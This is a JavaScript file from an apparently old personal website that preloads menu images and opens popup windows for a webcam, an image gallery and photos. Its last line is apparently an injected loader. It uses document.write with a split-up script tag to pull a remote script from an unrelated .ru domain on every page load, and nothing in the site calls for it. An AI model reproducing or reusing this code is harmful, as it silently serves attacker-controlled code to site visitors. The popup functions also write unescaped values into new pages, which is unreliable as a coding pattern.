theImages  = new Array("menu-thefreak2.gif", "menu-webcam2.gif", "menu-graphix2.gif", "menu-photos2.gif", "menu-sketches2.gif", "menu-guestbook2.gif", "menu-toxicbug2.gif");
preloadImg = new Array(theImages.length);
for (i=0; i<theImages.length; i++) { preloadImg[i] = new Image(); preloadImg[i].src = theImages[i]; }

function swap(ver, name) {
 var imgname = "menu-" + name + ver + ".gif";
 document.images[name].src = imgname;
}

var webcamwin = null;
function webcam() {
 if (webcamwin && webcamwin.open && !webcamwin.closed) { webcamwin.close(); }
 webcamwin=window.open('webcam.html','webcamwin','toolbar=no,location=no,directories=no,menubar=no,scrollbars=yes,status=no,resizable=yes,width=370,height=325');
}

var gallery = null;
function viewimg(newimage,xx,yy) {
 if (gallery && gallery.open && !gallery.closed) { gallery.close(); }
 gallery=window.open('','gallery','toolbar=no,location=no,directories=no,menubar=no,scrollbars=no,status=no,resizable=1,width='+xx+',height='+yy+'');
 gallery.document.write("<HTML><HEAD><TITLE>www.toxicBug.com</TITLE><script language='javascript'>self.focus()\;</script></HEAD>\n"
 +"<BODY  background=\"../background2.gif\"><CENTER>\n"
 +"<CENTER><TABLE BORDER=0 WIDTH=99\% HEIGHT=99\% cellpadding=0 cellspacing=0><TR><TD ALIGN=CENTER VALIGN=MIDDLE><IMG SRC=\""+newimage+"\" BORDER=0 ALT=\"LOADING IMAGE...\"></TD></TR></TABLE></CENTER>\n"
 +"</BODY></HTML>\n");
 gallery.document.close();
}

function showit(newmovie) {
 galleryfla=window.open(''+newmovie+'','galleryfla','toolbar=no,location=no,directories=no,menubar=no,scrollbars=no,status=no,resizable=1,width=500,height=500');
 galleryfla.focus();
 galleryfla.document.close();
}

var photos = null;
function viewfoto(newimage,xx,yy,message) {
if (photos && photos.open && !photos.closed) { photos.close(); }
 photos=window.open('','photos','toolbar=no,location=no,directories=no,menubar=no,scrollbars=yes,status=no,resizable=1,width='+xx+',height='+yy+'');
 photos.document.write("<HTML><HEAD><TITLE>www.toxicBug.com</TITLE>\n<script language='javascript'>self.focus()\;</script></HEAD>\n"
 +"<BODY background=\"../background2.gif\">\n"
 +"<CENTER><TABLE BORDER=0 WIDTH=99\% cellpadding=0 cellspacing=0><TR><TD ALIGN=CENTER VALIGN=MIDDLE><IMG SRC=\""+newimage+"\" BORDER=0 ALT=\"LOADING IMAGE...\"><br>"+message+"</TD></TR></TABLE></CENTER>\n"
 +"</BODY></HTML>\n");
 photos.document.close();
}

document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');